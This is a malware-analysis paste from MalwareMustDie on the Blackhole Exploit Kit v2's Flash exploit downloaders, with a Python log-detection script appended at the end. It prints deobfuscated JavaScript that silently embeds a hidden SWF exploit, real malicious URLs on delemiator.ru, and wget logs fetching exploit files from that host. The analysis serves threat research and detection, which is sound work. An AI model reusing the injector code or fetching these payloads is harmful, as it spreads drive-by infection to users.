=======================================
GET THE SWF EXPLOITER & INFECTOR
THERE ARE 2 (TWO) FUNCTIONS RELATED...
#MalwareMustDie | @unixfreaxjp ~]$ date
Sun Nov 25 20:50:32 JST 2012
=======================================
// There are also two SWF downloader functions:
function getCN()
{
return "/forum/links/column.php?seyjjv="+x("c833f")+"&apvpjz="+x("cvwyb")+"&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe"
}
// Let's crack the URL built by this function with the method above; the result is the download of the SWF exploit file below:
http://delemiator.ru:8080/forum/links/column.php?seyjjv=30:1n:1i:1i:33&apvpjz=30:3j:3k:3m:2w&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe
// download:
--17:24:41-- http://delemiator.ru:8080/forum/links/column.php?seyjjv=30:1n:1i:1i:33&apvpjz=30:3j:3k:3m:2w&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe
=> `column.php@seyjjv=30%3A1n%3A1i%3A1i%3A33&apvpjz=30%3A3j%3A3k%3A3m%3A2w&mzb=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&vsoyj=igoe'
Resolving delemiator.ru... 208.87.243.131, 202.180.221.186, 203.80.16.81
Connecting to delemiator.ru|208.87.243.131|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5,969 (5.8K) [text/html]
17:24:43 (128.15 MB/s) - `column.php@seyjjv=30%3A1n%3A1i%3A1i%3A33&apvpjz=30%3A3j%3A3k%3A3m%3A2w&mzb=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&vsoyj=igoe' saved [5969/5969]
// Here is another one, ff2(), which brings you to another download URL; see the decoding process below.
function ff2()
{
var oSpan=document.createElement("span");
var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>
<param name='movie' value='"+url+"' />
<param name='allowScriptAccess' value='always' />
<param name='Play' value='0' />
<embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'>
</embed></object>";
document.body.appendChild(oSpan);
}
// Focus on this line: var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
// With "yxjk" decoding to "3m:3l:37:38", we get the download URL below, to download another
http://delemiator.ru:8080/forum/links/column.php?cha=30:1n:1i:1i:33&oqbqt=3m:3l:37:38&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo
--17:35:50-- http://delemiator.ru:8080/forum/links/column.php?cha=30:1n:1i:1i:33&oqbqt=3m:3l:37:38&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo
=> `column.php@cha=30%3A1n%3A1i%3A1i%3A33&oqbqt=3m%3A3l%3A37%3A38&hahphpgk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pdwgygwj=liczqqdo'
Resolving delemiator.ru... 208.87.243.131, 202.180.221.186, 203.80.16.81
Connecting to delemiator.ru|208.87.243.131|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,043 (3.0K) [text/html]
17:35:52 (87.29 MB/s) - `column.php@cha=30%3A1n%3A1i%3A1i%3A33&oqbqt=3m%3A3l%3A37%3A38&hahphpgk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pdwgygwj=liczqqdo' saved [3043/3043]
// Digging further into this BHEK2 infector shows us that the static paths of these two SWF
// infectors also exist, as per the links below with download PoC:
--17:39:41-- http://delemiator.ru:8080/forum/data/field.swf
=> `field.swf'
Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
Connecting to delemiator.ru|202.180.221.186|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,043 (3.0K) [application/x-shockwave-flash]
17:39:44 (89.55 MB/s) - `field.swf' saved [3043/3043]
--17:39:54-- http://delemiator.ru:8080/forum/data/score.swf
=> `score.swf'
Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
Connecting to delemiator.ru|202.180.221.186|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5,969 (5.8K) [application/x-shockwave-flash]
17:39:56 (42.54 MB/s) - `score.swf' saved [5969/5969]
#MalwareMustDie!
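As an added defensive illustration (not part of the original paste): the two loader URLs above share a recognizable shape, every obfuscated query value is a run of colon-separated two-character base-36 tokens, and the dynamic column.php responses came back as text/html with exactly the byte counts of the static field.swf and score.swf. The Python below applies both observations to a constructed proxy-log excerpt; the log format and field names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Query values in the loaders above are runs of colon-separated two-character
# base-36 tokens (e.g. 30:1n:1i:1i:33). Require at least three tokens so short
# benign values such as "12:34" are not matched.
TOKEN_RUN = re.compile(r"^[0-9a-z]{2}(?::[0-9a-z]{2}){2,}$")


def is_token_run(value):
    return TOKEN_RUN.fullmatch(value) is not None


def looks_like_bhek2_url(url):
    """At least two query parameters carrying base-36 token runs."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return sum(is_token_run(v) for _, v in params) >= 2


def parse_log(text):
    """Assumed proxy-log format: host url status content-type bytes."""
    rows = []
    for line in text.strip().splitlines():
        host, url, status, ctype, size = line.split()
        rows.append({"host": host, "url": url, "status": int(status),
                     "ctype": ctype, "size": int(size)})
    return rows


def correlate(rows):
    """Pair each flagged URL with same-host SWF responses of identical size."""
    swfs = [r for r in rows if r["ctype"] == "application/x-shockwave-flash"]
    findings = []
    for r in rows:
        if r["status"] != 200 or not looks_like_bhek2_url(r["url"]):
            continue
        twins = [s["url"] for s in swfs
                 if s["host"] == r["host"] and s["size"] == r["size"]]
        findings.append((r["url"], r["ctype"], twins))
    return findings


# Constructed log excerpt: the URLs and sizes from the paste plus one benign hit.
SAMPLE_LOG = """
delemiator.ru http://delemiator.ru:8080/forum/links/column.php?seyjjv=30:1n:1i:1i:33&apvpjz=30:3j:3k:3m:2w&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe 200 text/html 5969
delemiator.ru http://delemiator.ru:8080/forum/links/column.php?cha=30:1n:1i:1i:33&oqbqt=3m:3l:37:38&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo 200 text/html 3043
delemiator.ru http://delemiator.ru:8080/forum/data/field.swf 200 application/x-shockwave-flash 3043
delemiator.ru http://delemiator.ru:8080/forum/data/score.swf 200 application/x-shockwave-flash 5969
example.org http://example.org/forum/index.php?page=12:34&sort=date 200 text/html 5969
"""

if __name__ == "__main__":
    for url, ctype, twins in correlate(parse_log(SAMPLE_LOG)):
        print(f"{ctype} response at {url} matches SWF size of: {twins}")
```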